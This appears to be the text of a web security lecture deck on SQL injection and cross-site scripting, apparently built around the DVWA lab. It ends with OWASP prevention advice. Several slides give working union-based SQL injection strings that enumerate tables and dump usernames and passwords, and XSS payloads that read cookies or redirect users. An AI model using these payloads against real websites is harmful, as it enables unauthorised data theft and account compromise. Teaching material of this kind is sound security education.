2. a word of warning
Everything that we are going over today, while
practical, is meant for penetration testing only!
You’ll get in a lot of trouble if you use this on live
websites that you don’t own!
Also…the fuzz will come after you.
4. what is sql injection
SQL injection (also known as SQL fishing) is a
technique often used to attack data driven
applications.
5. what is sql injection
This is done by including portions of SQL
statements in an entry field in an attempt to get
the website to pass a newly formed rogue SQL
command to the database (e.g., dump the
database contents to the attacker).
SQL injection is a code injection technique that
exploits a security vulnerability in an application's
software.
6. what is sql injection
This is done by including portions of SQL
statements in an entry field in an attempt to get
the website to pass a newly formed rogue SQL
command to the database (e.g., dump the
database contents to the attacker).
7. what is sql injection
The vulnerability happens when user input is
either incorrectly filtered for string literal escape
characters embedded in SQL statements or user
input is not strongly typed and unexpectedly
executed.
8. what is sql injection
The vulnerability happens when user input is
either incorrectly filtered for string literal escape
characters embedded in SQL statements or user
input is not strongly typed and unexpectedly
executed.
SQL injection is mostly known as an attack
vector for websites but can be used to attack
any type of SQL database.
9. what is sql injection
http://www.bugtracker.com/bugs.php?bugID=007
SELECT * FROM softwareBugs
WHERE bugID = $_GET[‘bugID’]
10. what is sql injection
http://www.bugtracker.com/bugs.php?bugID=007
SELECT * FROM softwareBugs
WHERE bugID = 007
11. what is sql injection
http://www.bugtracker.com/bugs.php?bugID=007 OR TRUE
SELECT * FROM softwareBugs
WHERE bugID = 007 OR TRUE
can be used to gain
access to all bugs
30. %' or 0=0 union select null,
database() #
finding out the name of the
database
31. %' and 1=0 union select null,
table_name from
information_schema.tables #
32. %' and 1=0 union select null,
table_name from
information_schema.tables #
Information_Schema part of the
database
33. %' and 1=0 union select null,
table_name from
information_schema.tables where
table_name like 'user%'#
34. %' and 1=0 union select null,
table_name from
information_schema.tables where
table_name like 'user%'#
finding tables that mention the
word ‘user’ at the start
35. %' and 1=0 union select null,
concat(table_name,
0x0a,column_name) from
information_schema.columns
where table_name = 'users' #
36. %' and 1=0 union select null,
concat(table_name,
0x0a,column_name) from
information_schema.columns
where table_name = 'users' #
Finding the names of all the fields
from the table ‘users’
37. %' and 1=0 union select null,
concat(first_name,
0x0a,last_name,0x0a,user,
0x0a,password) from users #
38. %' and 1=0 union select null,
concat(first_name,
0x0a,last_name,0x0a,user,
0x0a,password) from users #
finding all of the information
stored in the table users
39. And this is what we are after! The
admin password!
43. What is cross site scripting
Cross-site scripting (XSS) is a type of computer
security vulnerability typically found in Web
applications.
XSS enables attackers to inject client-side script
into Web pages viewed by other users.
A cross-site scripting vulnerability may be used
by attackers to bypass access controls such as
the same origin policy.
44. What is cross site scripting
In Addition, the attacker can send input (e.g.,
username, password, session ID, etc) which can
be later captured by an external script.
The victim's browser has no way to know that the
script should not be trusted, and will execute the
script. Because it thinks the script came from a
trusted source, the malicious script can access
any cookies, session tokens, or other sensitive
information retained by the browser and used
with that site.
56. <script>alert("This is a XSS
Exploit Test")</script>
<iframe src="http://
www.cnn.com"></iframe>
<script>alert(document.cookie)</
script>
<script>window.location=“http://
www.example.com”</script>
simple test
Embed content into the page
Get the current cookie used by a user
redirect the user to a different page
58. sql injection
Prepared Statements
Stored Procedures
Escaping all user supplied input
Least Privilege
White List Validation
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
59. Never insert untrusted data except in allowed locations
HTML Escape before inserting untrusted data into HTML
Attribute Escape…
Javascript Escape…
CSS Escape…
URL Escape…
In other words…check EVERYTHING! XSS is very common
and is really easy to exploit
XSS
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
60. We’re going to do a lot more protection in the lab…don’t
worry!
is that it!?
Going to give you a chance to improve a websites security
in terms of SQL injection and XSS vulnerabilities.
If you want to try some of these things out yourself…
we’re working on it
Getting DVWA to work properly on a secure network is
difficult, even ours!